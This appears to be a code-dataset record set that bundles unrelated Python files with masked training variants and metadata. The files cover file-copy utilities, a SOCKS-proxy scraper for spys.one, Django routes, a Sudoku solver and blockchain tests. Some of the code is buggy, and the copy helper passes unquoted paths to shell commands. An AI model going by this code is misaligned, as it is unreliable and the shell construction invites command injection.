source = os.path.normcase(os.path.normpath(str(source)))
dest = os.path.normcase(os.path.normpath(str(dest)))
flags = ''
if sys.platform == 'win32':
if force:
flags += ' /Y'
ctx.run('copy {flags} {source} {dest}'.format(**locals()))
else:
if force:
flags += ' --force'
ctx.run('cp {flags} {source} {dest}'.format(**locals()))
return dest
def concat(ctx, dest, *sources, **kw):
force = kw.pop('force', False)
placement = Path(dest).dirname()
placement.makedirs()
with open(dest, 'w') as out:
print('Opened:', dest, 'for writing.')
for s in sources:
with open(s, 'r') as inp:
print(' appending:', s)
out.writelines(inp.readlines())
out.write('\n')
fix_line_endings(dest)
return dest
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
from dkfileutils.path import Path
def line_endings(fname):
"""Return all line endings in the file.
"""
_endings = {line[-2:] for line in open(fname, 'rb').readlines()}
res = set()
for e in _endings:
if e.endswith(b'\r'):
res.add(b'\r')
elif e.endswith(b'\r\n'):
res.add(b'\r\n')
elif e.endswith(b'\n'):
res.add(b'\n')
return res
def chomp(s):
"""Remove line terminator if it exists.
"""
if s[-2:] == b'\r\n':
return s[:-2]
if s[-1:] == b'\r' or s[-1:] == b'\n':
return s[:-1]
return s
def fix_line_endings(fname, eol=b'\n'):
"""Change all line endings to ``eol``.
"""
lines = [chomp(line) for line in open(fname, 'rb').readlines()]
with open(fname, 'wb') as fp:
for line in lines:
fp.write(line + eol)
def copy(ctx, source, dest, force=False):
"""Copy ``source`` to ``dest``, which can be a file or directory.
"""
# print "COPY:", locals()
# print "COPY:", ctx.force, ctx.verbose
if source == dest:
return dest
source = os.path.normcase(os.path.normpath(str(source)))
dest = os.path.normcase(os.path.normpath(str(dest)))
flags = ""
if sys.platform == 'win32':
if force:
flags += " /Y"
# print 'copy {flags} {source} {dest}'.format(**locals())
ctx.run('copy {flags} {source} {dest}'.format(**locals()))
else: # pragma: nocover
if force:
flags += " --force"
ctx.run('cp {flags} {source} {dest}'.format(**locals()))
return dest
def concat(ctx, dest, *sources, **kw):
force = kw.pop('force', False) # noqa
placement = Path(dest).dirname()
placement.makedirs()
with open(dest, 'w') as out:
print("Opened:", dest, "for writing.")
for s in sources:
with open(s, 'r') as inp:
print(" appending:", s)
out.writelines(inp.readlines())
out.write('\n')
# flags = ""
# if sys.platform == 'win32':
# if force:
# flags += " /Y"
# source = '+'.join(sources)
# source = source.replace('/', '\\')
# ctx.run('copy {flags} {source} {dest}'.format(**locals()))
# else: # pragma: nocover
# if force:
# pass
# # flags += " --force"
# source = ' '.join(sources)
# # print 'cat {flags} {source} > {dest}'.format(**locals())
# ctx.run('cat {flags} {source} > {dest}'.format(**locals()))
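    # Normalize line endings, since the concatenated sources may mix CRLF and LF.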
fix_line_endings(dest)
# if len(line_endings(dest)) > 1:
# fix_line_endings(dest)
return dest
|
flexible
|
{
"blob_id": "be279fe44b0d52c9d473e08d8b9c28d5b6386b45",
"index": 5184,
"step-1": "<mask token>\n\n\ndef line_endings(fname):\n \"\"\"Return all line endings in the file.\n \"\"\"\n _endings = {line[-2:] for line in open(fname, 'rb').readlines()}\n res = set()\n for e in _endings:\n if e.endswith(b'\\r'):\n res.add(b'\\r')\n elif e.endswith(b'\\r\\n'):\n res.add(b'\\r\\n')\n elif e.endswith(b'\\n'):\n res.add(b'\\n')\n return res\n\n\n<mask token>\n\n\ndef fix_line_endings(fname, eol=b'\\n'):\n \"\"\"Change all line endings to ``eol``.\n \"\"\"\n lines = [chomp(line) for line in open(fname, 'rb').readlines()]\n with open(fname, 'wb') as fp:\n for line in lines:\n fp.write(line + eol)\n\n\n<mask token>\n\n\ndef concat(ctx, dest, *sources, **kw):\n force = kw.pop('force', False)\n placement = Path(dest).dirname()\n placement.makedirs()\n with open(dest, 'w') as out:\n print('Opened:', dest, 'for writing.')\n for s in sources:\n with open(s, 'r') as inp:\n print(' appending:', s)\n out.writelines(inp.readlines())\n out.write('\\n')\n fix_line_endings(dest)\n return dest\n",
"step-2": "<mask token>\n\n\ndef line_endings(fname):\n \"\"\"Return all line endings in the file.\n \"\"\"\n _endings = {line[-2:] for line in open(fname, 'rb').readlines()}\n res = set()\n for e in _endings:\n if e.endswith(b'\\r'):\n res.add(b'\\r')\n elif e.endswith(b'\\r\\n'):\n res.add(b'\\r\\n')\n elif e.endswith(b'\\n'):\n res.add(b'\\n')\n return res\n\n\ndef chomp(s):\n \"\"\"Remove line terminator if it exists.\n \"\"\"\n if s[-2:] == b'\\r\\n':\n return s[:-2]\n if s[-1:] == b'\\r' or s[-1:] == b'\\n':\n return s[:-1]\n return s\n\n\ndef fix_line_endings(fname, eol=b'\\n'):\n \"\"\"Change all line endings to ``eol``.\n \"\"\"\n lines = [chomp(line) for line in open(fname, 'rb').readlines()]\n with open(fname, 'wb') as fp:\n for line in lines:\n fp.write(line + eol)\n\n\n<mask token>\n\n\ndef concat(ctx, dest, *sources, **kw):\n force = kw.pop('force', False)\n placement = Path(dest).dirname()\n placement.makedirs()\n with open(dest, 'w') as out:\n print('Opened:', dest, 'for writing.')\n for s in sources:\n with open(s, 'r') as inp:\n print(' appending:', s)\n out.writelines(inp.readlines())\n out.write('\\n')\n fix_line_endings(dest)\n return dest\n",
"step-3": "<mask token>\n\n\ndef line_endings(fname):\n \"\"\"Return all line endings in the file.\n \"\"\"\n _endings = {line[-2:] for line in open(fname, 'rb').readlines()}\n res = set()\n for e in _endings:\n if e.endswith(b'\\r'):\n res.add(b'\\r')\n elif e.endswith(b'\\r\\n'):\n res.add(b'\\r\\n')\n elif e.endswith(b'\\n'):\n res.add(b'\\n')\n return res\n\n\ndef chomp(s):\n \"\"\"Remove line terminator if it exists.\n \"\"\"\n if s[-2:] == b'\\r\\n':\n return s[:-2]\n if s[-1:] == b'\\r' or s[-1:] == b'\\n':\n return s[:-1]\n return s\n\n\ndef fix_line_endings(fname, eol=b'\\n'):\n \"\"\"Change all line endings to ``eol``.\n \"\"\"\n lines = [chomp(line) for line in open(fname, 'rb').readlines()]\n with open(fname, 'wb') as fp:\n for line in lines:\n fp.write(line + eol)\n\n\ndef copy(ctx, source, dest, force=False):\n \"\"\"Copy ``source`` to ``dest``, which can be a file or directory.\n \"\"\"\n if source == dest:\n return dest\n source = os.path.normcase(os.path.normpath(str(source)))\n dest = os.path.normcase(os.path.normpath(str(dest)))\n flags = ''\n if sys.platform == 'win32':\n if force:\n flags += ' /Y'\n ctx.run('copy {flags} {source} {dest}'.format(**locals()))\n else:\n if force:\n flags += ' --force'\n ctx.run('cp {flags} {source} {dest}'.format(**locals()))\n return dest\n\n\ndef concat(ctx, dest, *sources, **kw):\n force = kw.pop('force', False)\n placement = Path(dest).dirname()\n placement.makedirs()\n with open(dest, 'w') as out:\n print('Opened:', dest, 'for writing.')\n for s in sources:\n with open(s, 'r') as inp:\n print(' appending:', s)\n out.writelines(inp.readlines())\n out.write('\\n')\n fix_line_endings(dest)\n return dest\n",
"step-4": "from __future__ import print_function\nimport os\nimport sys\nfrom dkfileutils.path import Path\n\n\ndef line_endings(fname):\n \"\"\"Return all line endings in the file.\n \"\"\"\n _endings = {line[-2:] for line in open(fname, 'rb').readlines()}\n res = set()\n for e in _endings:\n if e.endswith(b'\\r'):\n res.add(b'\\r')\n elif e.endswith(b'\\r\\n'):\n res.add(b'\\r\\n')\n elif e.endswith(b'\\n'):\n res.add(b'\\n')\n return res\n\n\ndef chomp(s):\n \"\"\"Remove line terminator if it exists.\n \"\"\"\n if s[-2:] == b'\\r\\n':\n return s[:-2]\n if s[-1:] == b'\\r' or s[-1:] == b'\\n':\n return s[:-1]\n return s\n\n\ndef fix_line_endings(fname, eol=b'\\n'):\n \"\"\"Change all line endings to ``eol``.\n \"\"\"\n lines = [chomp(line) for line in open(fname, 'rb').readlines()]\n with open(fname, 'wb') as fp:\n for line in lines:\n fp.write(line + eol)\n\n\ndef copy(ctx, source, dest, force=False):\n \"\"\"Copy ``source`` to ``dest``, which can be a file or directory.\n \"\"\"\n if source == dest:\n return dest\n source = os.path.normcase(os.path.normpath(str(source)))\n dest = os.path.normcase(os.path.normpath(str(dest)))\n flags = ''\n if sys.platform == 'win32':\n if force:\n flags += ' /Y'\n ctx.run('copy {flags} {source} {dest}'.format(**locals()))\n else:\n if force:\n flags += ' --force'\n ctx.run('cp {flags} {source} {dest}'.format(**locals()))\n return dest\n\n\ndef concat(ctx, dest, *sources, **kw):\n force = kw.pop('force', False)\n placement = Path(dest).dirname()\n placement.makedirs()\n with open(dest, 'w') as out:\n print('Opened:', dest, 'for writing.')\n for s in sources:\n with open(s, 'r') as inp:\n print(' appending:', s)\n out.writelines(inp.readlines())\n out.write('\\n')\n fix_line_endings(dest)\n return dest\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os\nimport sys\n\nfrom dkfileutils.path import Path\n\n\ndef line_endings(fname):\n \"\"\"Return all line endings in the file.\n \"\"\"\n _endings = {line[-2:] for line in open(fname, 'rb').readlines()}\n res = set()\n for e in _endings:\n if e.endswith(b'\\r'):\n res.add(b'\\r')\n elif e.endswith(b'\\r\\n'):\n res.add(b'\\r\\n')\n elif e.endswith(b'\\n'):\n res.add(b'\\n')\n return res\n\n\ndef chomp(s):\n \"\"\"Remove line terminator if it exists.\n \"\"\"\n if s[-2:] == b'\\r\\n':\n return s[:-2]\n if s[-1:] == b'\\r' or s[-1:] == b'\\n':\n return s[:-1]\n return s\n\n\ndef fix_line_endings(fname, eol=b'\\n'):\n \"\"\"Change all line endings to ``eol``.\n \"\"\"\n lines = [chomp(line) for line in open(fname, 'rb').readlines()]\n with open(fname, 'wb') as fp:\n for line in lines:\n fp.write(line + eol)\n\n\ndef copy(ctx, source, dest, force=False):\n \"\"\"Copy ``source`` to ``dest``, which can be a file or directory.\n \"\"\"\n # print \"COPY:\", locals()\n # print \"COPY:\", ctx.force, ctx.verbose\n if source == dest:\n return dest\n\n source = os.path.normcase(os.path.normpath(str(source)))\n dest = os.path.normcase(os.path.normpath(str(dest)))\n flags = \"\"\n if sys.platform == 'win32':\n if force:\n flags += \" /Y\"\n # print 'copy {flags} {source} {dest}'.format(**locals())\n ctx.run('copy {flags} {source} {dest}'.format(**locals()))\n else: # pragma: nocover\n if force:\n flags += \" --force\"\n ctx.run('cp {flags} {source} {dest}'.format(**locals()))\n return dest\n\n\ndef concat(ctx, dest, *sources, **kw):\n force = kw.pop('force', False) # noqa\n placement = Path(dest).dirname()\n placement.makedirs()\n\n with open(dest, 'w') as out:\n print(\"Opened:\", dest, \"for writing.\")\n for s in sources:\n with open(s, 'r') as inp:\n print(\" appending:\", s)\n out.writelines(inp.readlines())\n out.write('\\n')\n\n # flags = \"\"\n # if sys.platform == 'win32':\n # if force:\n # flags += \" /Y\"\n # source = '+'.join(sources)\n # source = source.replace('/', '\\\\')\n # ctx.run('copy {flags} {source} {dest}'.format(**locals()))\n # else: # pragma: nocover\n # if force:\n # pass\n # # flags += \" --force\"\n # source = ' '.join(sources)\n # # print 'cat {flags} {source} > {dest}'.format(**locals())\n # ctx.run('cat {flags} {source} > {dest}'.format(**locals()))\n\n fix_line_endings(dest)\n # if len(line_endings(dest)) > 1:\n # fix_line_endings(dest)\n\n return dest\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
#!/usr/bin/env python3
x = "Programming is like building a multilingual puzzle\n"
print (x)
|
normal
|
{
"blob_id": "95c0ba757b7561ef6cc0ad312034e2695f8420c3",
"index": 3933,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(x)\n",
"step-3": "x = 'Programming is like building a multilingual puzzle\\n'\nprint(x)\n",
"step-4": "#!/usr/bin/env python3\n\nx = \"Programming is like building a multilingual puzzle\\n\"\n\n\nprint (x)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProxyScrapper:
def __init__(self):
self._proxies = []
def refresh(self):
session = requests.Session()
session.headers['User-Agent'] = UserAgent().random
print('Rotating proxy list')
xx0 = _get_request_key(session)
print(f'Got proxy request key xx0={xx0}')
addrs = _get_proxy_list(session, xx0)
self._proxies = [f'socks5://{i}' for i in addrs]
print(f'Got {len(self._proxies)} proxies')
def random(self):
assert len(self._proxies) > 0
return random.choice(self._proxies)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _get_request_key(session):
res = session.post('https://spys.one/en/socks-proxy-list/')
soup = BeautifulSoup(res.text, 'html.parser')
return soup.find('input', {'name': 'xx0'}).get('value')
<|reserved_special_token_0|>
class ProxyScrapper:
def __init__(self):
self._proxies = []
def refresh(self):
session = requests.Session()
session.headers['User-Agent'] = UserAgent().random
print('Rotating proxy list')
xx0 = _get_request_key(session)
print(f'Got proxy request key xx0={xx0}')
addrs = _get_proxy_list(session, xx0)
self._proxies = [f'socks5://{i}' for i in addrs]
print(f'Got {len(self._proxies)} proxies')
def random(self):
assert len(self._proxies) > 0
return random.choice(self._proxies)
<|reserved_special_token_1|>
import re
import random
import requests
from bs4 import BeautifulSoup
import js2py
from fake_useragent import UserAgent
def _get_request_key(session):
res = session.post('https://spys.one/en/socks-proxy-list/')
soup = BeautifulSoup(res.text, 'html.parser')
return soup.find('input', {'name': 'xx0'}).get('value')
def _get_proxy_list(session, xx0):
res = session.post('https://spys.one/en/socks-proxy-list/', data=
f'xx0={xx0}&xpp={0}&xf1={0}&xf2={0}&xf4={0}&xf5={2}', headers={
'Content-Type': 'application/x-www-form-urlencoded'})
soup = BeautifulSoup(res.text, 'html.parser')
js = js2py.EvalJs({'document': {'write': lambda a: a}})
js.execute(soup.select_one('body > script').string)
addrs = soup.select('tr[onmouseover] > td:first-child')
ports = [js.eval(i.find('script').string) for i in addrs]
addrs = [i.get_text() for i in addrs]
ports = [re.sub('<[^<]*>', '', i) for i in ports]
return list(map(''.join, zip(addrs, ports)))
class ProxyScrapper:
def __init__(self):
self._proxies = []
def refresh(self):
session = requests.Session()
session.headers['User-Agent'] = UserAgent().random
print('Rotating proxy list')
xx0 = _get_request_key(session)
print(f'Got proxy request key xx0={xx0}')
addrs = _get_proxy_list(session, xx0)
self._proxies = [f'socks5://{i}' for i in addrs]
print(f'Got {len(self._proxies)} proxies')
def random(self):
assert len(self._proxies) > 0
return random.choice(self._proxies)
<|reserved_special_token_1|>
import re
import random
import requests
from bs4 import BeautifulSoup
import js2py
from fake_useragent import UserAgent
def _get_request_key(session):
res = session.post("https://spys.one/en/socks-proxy-list/")
soup = BeautifulSoup(res.text, 'html.parser')
return soup.find("input", {"name": "xx0"}).get("value")
def _get_proxy_list(session, xx0):
res = session.post("https://spys.one/en/socks-proxy-list/",
data=f"xx0={xx0}&xpp={0}&xf1={0}&xf2={0}&xf4={0}&xf5={2}",
headers={
"Content-Type": "application/x-www-form-urlencoded",
})
soup = BeautifulSoup(res.text, 'html.parser')
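    # spys.one obfuscates port numbers with inline JavaScript; run the page's script via js2py (document.write stubbed) so each row's port expression can be evaluated.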
js = js2py.EvalJs({"document": {"write": lambda a: a}})
js.execute(soup.select_one("body > script").string)
addrs = soup.select("tr[onmouseover] > td:first-child")
ports = [js.eval(i.find("script").string) for i in addrs]
addrs = [i.get_text() for i in addrs]
ports = [re.sub(r"<[^<]*>", "", i) for i in ports]
return list(map(''.join, zip(addrs, ports)))
class ProxyScrapper:
def __init__(self):
self._proxies = []
def refresh(self):
session = requests.Session()
session.headers["User-Agent"] = UserAgent().random
print("Rotating proxy list")
xx0 = _get_request_key(session)
print(f"Got proxy request key xx0={xx0}")
addrs = _get_proxy_list(session, xx0)
self._proxies = [f"socks5://{i}" for i in addrs]
print(f"Got {len(self._proxies)} proxies")
def random(self):
assert(len(self._proxies) > 0)
return random.choice(self._proxies)
from django.urls import path
from .authentication import GetToken, RegisterUserAPIView
from .resurses import *
urlpatterns = [
path('register/', RegisterUserAPIView.as_view()),
path('get/token/', GetToken.as_view()),
path('card/list/', ShowCardsAPIView.as_view()),
path('card/create/', CreateCardAPIView.as_view()),
path('card/<int:pk>/status/raise/', RaiseStatusAPIView.as_view()),
path('card/<int:pk>/status/omit/', OmitStatusAPIView.as_view()),
path('card/<int:pk>/delete/', DeleteCardAPIView.as_view()),
path('card/<int:pk>/update/', UpdateCardAPIView.as_view()),
path('card/get/', GetCardSListAPIView.as_view()),
]
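
# --- Added sketch (not part of the original urls.py) ---
# Shows how one of the routes above resolves; illustrative only, and assumes this
# module is the active ROOT_URLCONF.  Call it from a configured Django shell
# (e.g. `manage.py shell`) rather than at import time.
def _example_resolve():
    from django.urls import resolve
    match = resolve('/card/5/status/raise/')
    print(match.func.__name__)  # name of the class wrapped by as_view()
    print(match.kwargs)         # {'pk': 5} -- the <int:pk> converter yields an int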
with open("input_trees.txt") as file:
map = file.readlines()
map = [ line.strip() for line in map ]
slopes = [(1,1), (3,1), (5,1), (7,1),(1,2)]
total = 1
for slope in slopes:
treeCount = 0
row, column = 0, 0
while row + 1 < len(map):
row += slope[1]
column += slope[0]
space = map[row][column % len(map[row])]
if space == "#":
treeCount += 1
total *= treeCount
print(total)
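
# --- Added sketch (not part of the original script) ---
# The same traversal as a reusable function, assuming the grid wraps horizontally;
# the tiny sample map is made up for illustration.
def count_trees(grid, right, down):
    trees, col = 0, 0
    for row in range(down, len(grid), down):
        col += right
        if grid[row][col % len(grid[row])] == "#":
            trees += 1
    return trees

sample = ["..##",
          "#..#",
          ".#..",
          "..#."]
print(count_trees(sample, 3, 1))  # prints 1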
from pprint import pprint
from collections import Counter
from copy import deepcopy
class Sudoku():
def __init__(self, grid):
'''
Initializes the grid
'''
self.grid = grid
self.sub_grid = self.create_sub_grid(self.grid)
def create_sub_grid(self, grid):
'''
Creates a Sub grid, containing the possible numbers within a cell
Returns a Sub grid
'''
sub_grid = []
for i in range(9):
sub = []
for j in range(9):
if grid[i][j] == 0:
sub.append(self.missing_numbers(i,j))
else:
sub.append([grid[i][j]])
sub_grid.append(sub)
del sub
return sub_grid
def missing_numbers(self, row, column):
'''
        Returns the possible candidate numbers for the cell at the given row and column
'''
rrow, ccolumn = self.row_and_column(self.grid, row, column)
cell = self.cell_3by3(row, column)
missing_num = list({i for i in range(1, 10)} - set(rrow + ccolumn + cell))
return missing_num
def cell_3by3(self, row, column):
'''
Returns grid of 3 X 3
'''
cell = []
a = row // 3
b = column // 3
for i in range(9):
for j in range(9):
                if i // 3 == a and j // 3 == b:
                    cell.append(self.grid[i][j])
return cell
def row_and_column(self, grid, row, column):
'''
Returns rows and columns
'''
r = grid[row]
c = []
for j in range(9):
c.append(grid[j][column])
return r, c
def step_1(self, sub_grid, num):
'''
Reducing a list of clues to a single value based on row and column elimination
Returns a refined sub grid
'''
row,column = self.row_and_column(sub_grid,num,num)
row_flatten = sum(row,[])
single_values = [i for i,j in Counter(row_flatten).items() if j == 1 ]
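        # 'hidden single': a candidate that appears exactly once among this row's lists
        # can only belong to that one cell, so the cell is fixed to it below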
# For Rows
for i in range(len(sub_grid)):
for j in single_values:
if j in sub_grid[num][i] and len(sub_grid[num][i]) != 1:
sub_grid[num][i] = [j]
# For Columns
column_flatten = sum(column, [])
column_single_values = [i for i,j in Counter(column_flatten).items() if j == 1 ]
for i in range(len(sub_grid)):
for j in column_single_values:
if j in sub_grid[i][num] and len(sub_grid[i][num]) != 1:
sub_grid[i][num] = [j]
return sub_grid
def step_2(self, sub_grid, num):
'''
        Removes a number 'n' that is already fixed in a cell from the other candidate lists in its row and column
Returns refined sub grid
'''
row,column = self.row_and_column(sub_grid,num,num)
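        # 'naked single': a value already fixed in one cell is removed from every other
        # candidate list in the same row (and, further down, the same column)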
# For Rows
single_value_list = []
for i in range(len(row)):
if len(sub_grid[num][i]) == 1:
single_value_list.append(sub_grid[num][i])
single_value_list_flatten = sum(single_value_list, [])
for i in range(len(sub_grid)):
if len(sub_grid[num][i]) != 1:
for j in single_value_list_flatten:
if j in sub_grid[num][i]:
sub_grid[num][i].remove(j)
# For Columns
single_value_list = []
for i in range(len(column)):
if len(sub_grid[i][num]) == 1:
single_value_list.append(sub_grid[i][num])
single_value_list_flatten = sum(single_value_list, [])
for i in range(len(sub_grid)):
if len(sub_grid[i][num]) != 1:
for j in single_value_list_flatten:
if j in sub_grid[i][num]:
sub_grid[i][num].remove(j)
return sub_grid
def step_3(self, sub_grid, num):
pass
def perform(self):
'''
        Performs step_1 and step_2 repeatedly until the sub grid stops changing
Returns None
'''
temp = []
while self.sub_grid != temp:
temp = deepcopy(self.sub_grid)
            for i in range(len(self.grid)):
self.sub_grid = self.step_1(self.sub_grid, i)
self.sub_grid = self.step_2(self.sub_grid, i)
def solve(self):
'''
Solves the Sub grid and prints the sub grid
Returns None
'''
self.perform()
for i in range(9):
for j in range(9):
print(self.sub_grid[i][j], end=' ')
print()
# grid = [
# [0,3,0,0,1,0,0,6,0],
# [7,5,0,0,3,0,0,4,8],
# [0,0,6,9,8,4,3,0,0],
# [0,0,3,0,0,0,8,0,0],
# [9,1,2,0,0,0,6,7,4],
# [0,0,4,0,0,0,5,0,0],
# [0,0,1,6,7,5,2,0,0],
# [6,8,0,0,9,0,0,1,5],
# [0,9,0,0,4,0,0,3,0]
# ]
# grid = [
# [6,0,0,1,0,8,2,0,3],
# [0,2,0,0,4,0,0,9,0],
# [8,0,3,0,0,5,4,0,0],
# [5,0,4,6,0,7,0,0,9],
# [0,3,0,0,0,0,0,5,0],
# [7,0,0,8,0,3,1,0,2],
# [0,0,1,7,0,0,9,0,6],
# [0,8,0,0,3,0,0,2,0],
# [3,0,2,9,0,4,0,0,5]
# ]
grid = [
[8,0,6,0,0,0,4,0,9],
[0,0,0,0,0,0,0,0,0],
[0,9,2,0,0,0,5,0,8],
[0,0,9,0,7,1,3,0,0],
[5,0,8,0,0,0,0,2,0],
[0,0,4,0,5,0,0,0,0],
[0,0,0,0,0,7,9,1,0],
[0,0,0,9,0,0,0,0,7],
[0,7,0,0,0,3,0,0,4],
]
mat = Sudoku(grid)
mat.solve()
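
# --- Added sketch (not part of the original solver) ---
# Hypothetical helper that flattens the candidate grid back to plain digits once the
# elimination steps have reduced every cell to a single value; unsolved cells show as 0.
def as_plain_grid(sub_grid):
    return [[cell[0] if len(cell) == 1 else 0 for cell in row] for row in sub_grid]

for row in as_plain_grid(mat.sub_grid):
    print(row)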
import time
import random
from BlockchainNetwork.MVB import *
from threading import Thread
coloredlogs.install()
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
log = logging.getLogger(__name__)
class MVBTest:
def __init__(self, initialNodeCnt):
self.mvb = MVB()
self.signingKeysList = []
self.pubKeysList = []
self.pubKeysByteList = []
self.__initialSigningKeys()
self.__initialPubKeys()
self.mvb.generateGenesisBlockFromJson()
self.mvb.initialNodes(initialNodeCnt)
for i, node in enumerate(self.mvb.networkNodes):
nodeThread = Thread(target=self.threadMining, args=(node, 1))
nodeThread.start()
def multipleValidTxTest(self):
"""
This method tests multiple valid transactions
"""
log.info("--------------------Multiple valid Tx tests now started-------------------")
self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/MultipleValidTestTx.json')
self.mvb.broadcastTxPools()
def doubleSpendTest(self):
"""
txOutputs is the genesis output.
txOutputs[0] was used twice in this test.
Both Tx1 and Tx2 make txOutputs[0] as input.
        When Tx2 is mined, the verification will fail.
"""
log.info("--------------------Double spend test now started-------------------")
log.info("A pair of valid and invalid transactions is added into GlobalTx Pool")
self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/DoubleSpendTestTx.json')
self.mvb.broadcastTxPools()
def inputOutputSumTest(self):
log.info("--------------------Input output sum test now started-------------------")
log.info("A pair of valid and invalid Transactions is added into GlobalTx Pool")
self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/InputOutputSumTestTx.json')
self.mvb.broadcastTxPools()
def sigVerifyTest(self):
log.info("--------------------Signature verify test now started-------------------")
log.info("A pair of valid and invalid Transactions is added into GlobalTx Pool")
self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/SigVerifyTestTx.json')
self.mvb.broadcastTxPools()
def numberHashTest(self):
log.info("--------------------Number hash test now started-------------------")
log.info("A pair of valid and invalid Transactions is added into GlobalTx Pool")
self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/NumberHashTestTx.json')
self.mvb.broadcastTxPools()
def txInputsExistTest(self):
log.info("--------------------Transaction inputs exist test now started-------------------")
log.info("A pair of valid and invalid Transactions is added into GlobalTx Pool")
self.mvb.txWaitingPool += self.readTxFromFile('./TxFiles/TxInputsExistTestTx.json')
self.mvb.broadcastTxPools()
def prevHashMatchTest(self):
log.info("--------------------Prev Hash test now started-------------------")
log.info("Node 2 broadcast a Block with invalid prev-hash to the other nodes")
txList = self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')
self.mvb.networkNodes[1].mineInvalidBlock(txList[0], isInvalidPrevHash=True)
def blockPOWTest(self):
log.info("--------------------Block POW test now started-------------------")
log.info("Node 1 broadcast a Block with invalid POW to the other nodes")
txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')
self.mvb.networkNodes[0].mineInvalidBlock(txList[0], isInvalidPOW=True)
def threadMining(self, node: Node, i):
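        # each node thread polls for blocks broadcast by its peers and mines any queued
        # transactions for roughly 15 seconds, then persists its chain to disk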
nowTime = time.time()
while True:
sleep(random.uniform(0.05, 0.1))
node.receiveBroadcastBlock()
for tx in node.globalTxPool:
node.mineBlock(tx)
if node.globalTxPool:
node.globalTxPool.remove(tx)
if time.time() - nowTime > 15:
break
node.saveToFile()
def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):
txListJsonObj = {'txList': []}
for tx in txList:
txListJsonObj['txList'].append(tx.getJsonObj())
with open(FILENAME, 'w', encoding='utf-8') as f:
f.write(json.dumps(txListJsonObj, indent=4))
def readTxFromFile(self, FILENAME: str) -> List[Transaction]:
txList = []
with open(FILENAME, 'r', encoding='utf-8') as f:
txListJsonObj = json.load(f)
for txObj in txListJsonObj['txList']:
newTx = Transaction(jsonObj=txObj)
txList.append(newTx)
return txList
def __initialSigningKeys(self) -> None:
"""
Generate and update signingKeys List for the network
"""
seedStr = '0' * 31
seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']
seedList = []
for i in range(15):
seed = seedStr + seedNum[i]
seedList.append(seed.encode('utf-8'))
for seed in seedList:
self.signingKeysList.append(SigningKey(seed))
log.info("15 signing keys have been generated successfully")
def __initialPubKeys(self):
for signingKey in self.signingKeysList:
verifyKey = signingKey.verify_key
verifyKeyByte = verifyKey.encode(encoder=HexEncoder)
self.pubKeysList.append(verifyKey)
self.pubKeysByteList.append(verifyKeyByte)
log.info(str(len(self.pubKeysList)) + " public keys have been generated successfully")
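
# --- Added sketch (not part of the original module) ---
# A possible test driver; the node count and the selection of tests are illustrative
# assumptions, and the ./TxFiles/*.json fixtures referenced above must already exist.
if __name__ == '__main__':
    tester = MVBTest(initialNodeCnt=4)
    tester.multipleValidTxTest()
    tester.doubleSpendTest()
    tester.inputOutputSumTest()
    tester.sigVerifyTest()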
"step-2": "<mask token>\n\n\nclass MVBTest:\n\n def __init__(self, initialNodeCnt):\n self.mvb = MVB()\n self.signingKeysList = []\n self.pubKeysList = []\n self.pubKeysByteList = []\n self.__initialSigningKeys()\n self.__initialPubKeys()\n self.mvb.generateGenesisBlockFromJson()\n self.mvb.initialNodes(initialNodeCnt)\n for i, node in enumerate(self.mvb.networkNodes):\n nodeThread = Thread(target=self.threadMining, args=(node, 1))\n nodeThread.start()\n\n def multipleValidTxTest(self):\n \"\"\"\n This method tests multiple valid transactions\n \"\"\"\n log.info(\n '--------------------Multiple valid Tx tests now started-------------------'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/MultipleValidTestTx.json')\n self.mvb.broadcastTxPools()\n\n def doubleSpendTest(self):\n \"\"\"\n txOutputs is the genesis output.\n txOutputs[0] was used twice in this test.\n Both Tx1 and Tx2 make txOutputs[0] as input.\n When Tx2 is mined, the verification will be failed.\n \"\"\"\n log.info(\n '--------------------Double spend test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/DoubleSpendTestTx.json')\n self.mvb.broadcastTxPools()\n\n def inputOutputSumTest(self):\n log.info(\n '--------------------Input output sum test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/InputOutputSumTestTx.json')\n self.mvb.broadcastTxPools()\n\n def sigVerifyTest(self):\n log.info(\n '--------------------Signature verify test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/SigVerifyTestTx.json')\n self.mvb.broadcastTxPools()\n\n def numberHashTest(self):\n log.info(\n '--------------------Number hash test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/NumberHashTestTx.json')\n self.mvb.broadcastTxPools()\n\n def txInputsExistTest(self):\n log.info(\n '--------------------Transaction inputs exist test now started-------------------'\n )\n log.info(\n 'A pair of valid and invalid Transactions is added into GlobalTx Pool'\n )\n self.mvb.txWaitingPool += self.readTxFromFile(\n './TxFiles/TxInputsExistTestTx.json')\n self.mvb.broadcastTxPools()\n\n def prevHashMatchTest(self):\n log.info(\n '--------------------Prev Hash test now started-------------------'\n )\n log.info(\n 'Node 2 broadcast a Block with invalid prev-hash to the other nodes'\n )\n txList = 